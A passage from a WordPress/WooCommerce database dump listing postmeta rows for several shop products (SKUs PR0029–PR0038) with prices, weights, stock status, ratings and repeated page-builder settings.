iles','a:0:{}'),(55629,3118,'_product_attributes','a:0:{}'),(55630,3118,'_product_version','3.4.3'),(55631,3118,'_price','58'),(55632,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55633,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55634,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55635,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55636,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55637,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55638,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55639,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55640,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55641,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55642,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55643,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55644,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55645,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55646,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55647,3118,'mkdf_show_new_sign_woo_meta','no'),(55648,3118,'slide_template','default'),(55649,3118,'_wpb_vc_js_status','false'),(55650,3118,'_wp_old_slug','sea-weed-risotto'),(55651,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55652,3119,'_sku','PR0029'),(55653,3119,'_regular_price','95'),(55654,3119,'_sale_price',''),(55655,3119,'_sale_price_dates_from',''),(55656,3119,'_sale_price_dates_to',''),(55657,3119,'total_sales','0'),(55658,3119,'_tax_status','taxable'),(55659,3119,'_tax_class',''),(55660,3119,'_manage_stock','no'),(55661,3119,'_backorders','no'),(55662,3119,'_sold_individually','no'),(55663,3119,'_weight','100'),(55664,3119,'_length',''),(55665,3119,'_width',''),(55666,3119,'_height',''),(55667,3119,'_upsell_ids','a:0:{}'),(55668,3119,'_crosssell_ids','a:0:{}'),(55669,3119,'_purchase_note',''),(55670,3119,'_default_attributes','a:0:{}'),(55671,3119,'_virtual','no'),(55672,3119,'_downloadable','no'),(55673,3119,'_product_image_gallery',''),(55674,3119,'_download_limit','-1'),(55675,3119,'_download_expiry','-1'),(55676,3119,'_thumbnail_id','278'),(55677,3119,'_stock',''),(55678,3119,'_stock_status','instock'),(55679,3119,'_wc_average_rating','4.00'),(55680,3119,'_wc_rating_count','a:1:{i:4;i:1;}'),(55681,3119,'_wc_review_count','1'),(55682,3119,'_downloadable_files','a:0:{}'),(55683,3119,'_product_attributes','a:0:{}'),(55684,3119,'_product_version','3.4.3'),(55685,3119,'_price','95'),(55686,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55687,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55688,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55689,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55690,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55691,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55692,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55693,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55694,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55695,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55696,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55697,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55698,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55699,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55700,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55701,3119,'mkdf_show_new_sign_woo_meta','no'),(55702,3119,'slide_template','default'),(55703,3119,'_wpb_vc_js_status','false'),(55704,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55705,3120,'_sku','PR0031'),(55706,3120,'_regular_price','86'),(55707,3120,'_sale_price',''),(55708,3120,'_sale_price_dates_from',''),(55709,3120,'_sale_price_dates_to',''),(55710,3120,'total_sales','0'),(55711,3120,'_tax_status','taxable'),(55712,3120,'_tax_class',''),(55713,3120,'_manage_stock','no'),(55714,3120,'_backorders','no'),(55715,3120,'_sold_individually','no'),(55716,3120,'_weight','100'),(55717,3120,'_length',''),(55718,3120,'_width',''),(55719,3120,'_height',''),(55720,3120,'_upsell_ids','a:0:{}'),(55721,3120,'_crosssell_ids','a:0:{}'),(55722,3120,'_purchase_note',''),(55723,3120,'_default_attributes','a:0:{}'),(55724,3120,'_virtual','no'),(55725,3120,'_downloadable','no'),(55726,3120,'_product_image_gallery',''),(55727,3120,'_download_limit','-1'),(55728,3120,'_download_expiry','-1'),(55729,3120,'_thumbnail_id','274'),(55730,3120,'_stock',''),(55731,3120,'_stock_status','instock'),(55732,3120,'_wc_average_rating','5.00'),(55733,3120,'_wc_rating_count','a:1:{i:5;i:1;}'),(55734,3120,'_wc_review_count','1'),(55735,3120,'_downloadable_files','a:0:{}'),(55736,3120,'_product_attributes','a:0:{}'),(55737,3120,'_product_version','3.4.3'),(55738,3120,'_price','86'),(55739,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55740,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55741,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55742,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55743,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55744,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55745,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55746,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55747,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55748,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55749,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55750,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55751,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55752,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55753,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55754,3120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55755,3120,'mkdf_show_new_sign_woo_meta','yes'),(55756,3120,'slide_template','default'),(55757,3120,'_wpb_vc_js_status','false'),(55758,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55759,3121,'_sku','PR0032'),(55760,3121,'_regular_price','86'),(55761,3121,'_sale_price',''),(55762,3121,'_sale_price_dates_from',''),(55763,3121,'_sale_price_dates_to',''),(55764,3121,'total_sales','0'),(55765,3121,'_tax_status','taxable'),(55766,3121,'_tax_class',''),(55767,3121,'_manage_stock','no'),(55768,3121,'_backorders','no'),(55769,3121,'_sold_individually','no'),(55770,3121,'_weight','100'),(55771,3121,'_length',''),(55772,3121,'_width',''),(55773,3121,'_height',''),(55774,3121,'_upsell_ids','a:0:{}'),(55775,3121,'_crosssell_ids','a:0:{}'),(55776,3121,'_purchase_note',''),(55777,3121,'_default_attributes','a:0:{}'),(55778,3121,'_virtual','no'),(55779,3121,'_downloadable','no'),(55780,3121,'_product_image_gallery',''),(55781,3121,'_download_limit','-1'),(55782,3121,'_download_expiry','-1'),(55783,3121,'_thumbnail_id','277'),(55784,3121,'_stock',''),(55785,3121,'_stock_status','instock'),(55786,3121,'_wc_average_rating','4.00'),(55787,3121,'_wc_rating_count','a:1:{i:4;i:1;}'),(55788,3121,'_wc_review_count','1'),(55789,3121,'_downloadable_files','a:0:{}'),(55790,3121,'_product_attributes','a:0:{}'),(55791,3121,'_product_version','3.4.3'),(55792,3121,'_price','86'),(55793,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55794,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55795,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55796,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55797,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55798,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55799,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55800,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55801,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55802,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55803,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55804,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55805,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55806,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55807,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55808,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55809,3121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55810,3121,'mkdf_show_new_sign_woo_meta','no'),(55811,3121,'slide_template','default'),(55812,3121,'_wpb_vc_js_status','false'),(55813,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55814,3122,'_sku','PR0033'),(55815,3122,'_regular_price','86'),(55816,3122,'_sale_price',''),(55817,3122,'_sale_price_dates_from',''),(55818,3122,'_sale_price_dates_to',''),(55819,3122,'total_sales','0'),(55820,3122,'_tax_status','taxable'),(55821,3122,'_tax_class',''),(55822,3122,'_manage_stock','no'),(55823,3122,'_backorders','no'),(55824,3122,'_sold_individually','no'),(55825,3122,'_weight','100'),(55826,3122,'_length',''),(55827,3122,'_width',''),(55828,3122,'_height',''),(55829,3122,'_upsell_ids','a:0:{}'),(55830,3122,'_crosssell_ids','a:0:{}'),(55831,3122,'_purchase_note',''),(55832,3122,'_default_attributes','a:0:{}'),(55833,3122,'_virtual','no'),(55834,3122,'_downloadable','no'),(55835,3122,'_product_image_gallery',''),(55836,3122,'_download_limit','-1'),(55837,3122,'_download_expiry','-1'),(55838,3122,'_thumbnail_id','517'),(55839,3122,'_stock',''),(55840,3122,'_stock_status','instock'),(55841,3122,'_wc_average_rating','4.00'),(55842,3122,'_wc_rating_count','a:1:{i:4;i:1;}'),(55843,3122,'_wc_review_count','1'),(55844,3122,'_downloadable_files','a:0:{}'),(55845,3122,'_product_attributes','a:0:{}'),(55846,3122,'_product_version','3.4.3'),(55847,3122,'_price','86'),(55848,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55849,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55850,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55851,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55852,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55853,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55854,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55855,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55856,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55857,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55858,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55859,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55860,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55861,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55862,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55863,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55864,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55865,3122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55866,3122,'mkdf_show_new_sign_woo_meta','no'),(55867,3122,'slide_template',''),(55868,3122,'_wpb_vc_js_status','false'),(55869,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55870,528,'_sku','PR0034'),(55871,528,'_regular_price','150'),(55872,528,'_sale_price','115'),(55873,528,'_sale_price_dates_from',''),(55874,528,'_sale_price_dates_to',''),(55875,528,'total_sales','0'),(55876,528,'_tax_status','taxable'),(55877,528,'_tax_class',''),(55878,528,'_manage_stock','no'),(55879,528,'_backorders','no'),(55880,528,'_sold_individually','no'),(55881,528,'_weight','350'),(55882,528,'_length',''),(55883,528,'_width',''),(55884,528,'_height',''),(55885,528,'_upsell_ids','a:0:{}'),(55886,528,'_crosssell_ids','a:0:{}'),(55887,528,'_purchase_note',''),(55888,528,'_default_attributes','a:0:{}'),(55889,528,'_virtual','no'),(55890,528,'_downloadable','no'),(55891,528,'_product_image_gallery',''),(55892,528,'_download_limit','-1'),(55893,528,'_download_expiry','-1'),(55894,528,'_thumbnail_id','520'),(55895,528,'_stock',''),(55896,528,'_stock_status','instock'),(55897,528,'_wc_average_rating','3.00'),(55898,528,'_wc_rating_count','a:1:{i:3;i:1;}'),(55899,528,'_wc_review_count','1'),(55900,528,'_downloadable_files','a:0:{}'),(55901,528,'_product_attributes','a:0:{}'),(55902,528,'_product_version','3.4.3'),(55903,528,'_price','115'),(55904,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55905,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55906,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55907,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55908,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55909,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55910,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55911,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55912,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55913,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55914,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55915,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55916,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55917,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55918,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55919,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55920,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55921,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55922,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55923,528,'mkdf_show_new_sign_woo_meta','no'),(55924,528,'slide_template','default'),(55925,528,'_wpb_vc_js_status','false'),(55926,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55927,530,'_sku','PR0035'),(55928,530,'_regular_price','50'),(55929,530,'_sale_price',''),(55930,530,'_sale_price_dates_from',''),(55931,530,'_sale_price_dates_to',''),(55932,530,'total_sales','0'),(55933,530,'_tax_status','taxable'),(55934,530,'_tax_class',''),(55935,530,'_manage_stock','no'),(55936,530,'_backorders','no'),(55937,530,'_sold_individually','no'),(55938,530,'_weight','150'),(55939,530,'_length',''),(55940,530,'_width',''),(55941,530,'_height',''),(55942,530,'_upsell_ids','a:0:{}'),(55943,530,'_crosssell_ids','a:0:{}'),(55944,530,'_purchase_note',''),(55945,530,'_default_attributes','a:0:{}'),(55946,530,'_virtual','no'),(55947,530,'_downloadable','no'),(55948,530,'_product_image_gallery',''),(55949,530,'_download_limit','-1'),(55950,530,'_download_expiry','-1'),(55951,530,'_thumbnail_id','521'),(55952,530,'_stock',''),(55953,530,'_stock_status','instock'),(55954,530,'_wc_average_rating','5.00'),(55955,530,'_wc_rating_count','a:1:{i:5;i:1;}'),(55956,530,'_wc_review_count','1'),(55957,530,'_downloadable_files','a:0:{}'),(55958,530,'_product_attributes','a:0:{}'),(55959,530,'_product_version','3.4.3'),(55960,530,'_price','50'),(55961,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55962,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55963,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55964,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55965,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55966,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55967,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55968,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55969,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55970,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55971,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55972,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55973,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55974,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55975,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55976,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55977,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55978,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55979,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55980,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55981,530,'mkdf_show_new_sign_woo_meta','no'),(55982,530,'slide_template',''),(55983,530,'_wpb_vc_js_status','false'),(55984,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(55985,3123,'_sku','PR0036'),(55986,3123,'_regular_price','100'),(55987,3123,'_sale_price',''),(55988,3123,'_sale_price_dates_from',''),(55989,3123,'_sale_price_dates_to',''),(55990,3123,'total_sales','0'),(55991,3123,'_tax_status','taxable'),(55992,3123,'_tax_class',''),(55993,3123,'_manage_stock','no'),(55994,3123,'_backorders','no'),(55995,3123,'_sold_individually','no'),(55996,3123,'_weight','100'),(55997,3123,'_length',''),(55998,3123,'_width',''),(55999,3123,'_height',''),(56000,3123,'_upsell_ids','a:0:{}'),(56001,3123,'_crosssell_ids','a:0:{}'),(56002,3123,'_purchase_note',''),(56003,3123,'_default_attributes','a:0:{}'),(56004,3123,'_virtual','no'),(56005,3123,'_downloadable','no'),(56006,3123,'_product_image_gallery',''),(56007,3123,'_download_limit','-1'),(56008,3123,'_download_expiry','-1'),(56009,3123,'_thumbnail_id','519'),(56010,3123,'_stock',''),(56011,3123,'_stock_status','outofstock'),(56012,3123,'_wc_average_rating','5.00'),(56013,3123,'_wc_rating_count','a:1:{i:5;i:1;}'),(56014,3123,'_wc_review_count','1'),(56015,3123,'_downloadable_files','a:0:{}'),(56016,3123,'_product_attributes','a:0:{}'),(56017,3123,'_product_version','3.4.3'),(56018,3123,'_price','100'),(56019,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56020,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56021,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56022,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56023,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56024,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56025,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56026,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56027,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56028,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56029,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56030,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56031,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56032,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56033,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56034,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56035,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56036,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56037,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56038,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56039,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56040,3123,'mkdf_show_new_sign_woo_meta','no'),(56041,3123,'slide_template','default'),(56042,3123,'_wpb_vc_js_status','false'),(56043,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56044,3124,'_sku','PR0037'),(56045,3124,'_regular_price','120'),(56046,3124,'_sale_price',''),(56047,3124,'_sale_price_dates_from',''),(56048,3124,'_sale_price_dates_to',''),(56049,3124,'total_sales','0'),(56050,3124,'_tax_status','taxable'),(56051,3124,'_tax_class',''),(56052,3124,'_manage_stock','no'),(56053,3124,'_backorders','no'),(56054,3124,'_sold_individually','no'),(56055,3124,'_weight','150'),(56056,3124,'_length',''),(56057,3124,'_width',''),(56058,3124,'_height',''),(56059,3124,'_upsell_ids','a:0:{}'),(56060,3124,'_crosssell_ids','a:0:{}'),(56061,3124,'_purchase_note',''),(56062,3124,'_default_attributes','a:0:{}'),(56063,3124,'_virtual','no'),(56064,3124,'_downloadable','no'),(56065,3124,'_product_image_gallery',''),(56066,3124,'_download_limit','-1'),(56067,3124,'_download_expiry','-1'),(56068,3124,'_thumbnail_id','518'),(56069,3124,'_stock',''),(56070,3124,'_stock_status','instock'),(56071,3124,'_wc_average_rating','5.00'),(56072,3124,'_wc_rating_count','a:1:{i:5;i:1;}'),(56073,3124,'_wc_review_count','1'),(56074,3124,'_downloadable_files','a:0:{}'),(56075,3124,'_product_attributes','a:0:{}'),(56076,3124,'_product_version','3.4.3'),(56077,3124,'_price','120'),(56078,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56079,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56080,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56081,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56082,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56083,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56084,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56085,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56086,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56087,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56088,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56089,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56090,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56091,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56092,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56093,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56094,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56095,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56096,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56097,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56098,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56099,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56100,3124,'mkdf_show_new_sign_woo_meta','yes'),(56101,3124,'slide_template','default'),(56102,3124,'_wpb_vc_js_status','false'),(56103,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56104,3125,'_sku','PR0038'),(56105,3125,'_regular_price','185'),(56106,3125,'_sale_price','120'),(56107,3125,'_sale_price_dates_from',''),(56108,3125,'_sale_price_dates_to',''),(56109,3125,'total_sales','0'),(56110,3125,'_tax_status','taxable'),(56111,3125,'_tax_class',''),(56112,3125,'_manage_stock','no'),(56113,3125,'_backorders','no'),(56114,3125,'_sold_individually','no'),(56115,3125,'_weight','185'),(56116,3125,'_length',''),(56117,3125,'_width',''),(56118,3125,'_height',''),(56119,3125,'_upsell_ids','a:0:{}'),(56120,3125,'_crosssell_ids','a:0:{}'),(56121,3125,'_purchase_note',''),(56122,3125,'_default_attributes','a:0:{}'),(56123,3125,'_virtual','no'),(56124,3125,'_downloadable','no'),(56125,3125,'_product_image_gallery',''),(56126,3125,'_download_limit','-1'),(56127,3125,'_download_expiry','-1'),(56128,3125,'_thumbnail_id','535'),(56129,3125,'_stock',''),(56130,3125,'_stock_status','instock'),(56131,3125,'_wc_average_rating','3.50'),(56132,3125,'_wc_rating_count','a:2:{i:3;i:1;i:4;i:1;}'),(56133,3125,'_wc_review_count','2'),(56134,3125,'_downloadable_files','a:0:{}'),(56135,3125,'_product_attributes','a:0:{}'),(56136,3125,'_product_version','3.4.3'),(56137,3125,'_price','120'),(56138,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56139,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56140,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56141,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56142,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56143,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56144,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56145,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56146,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56147,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56148,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56149,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56150,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56151,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56152,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56153,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56154,3125,'_vc_post_settings','a:1:{s:10:\"vc_g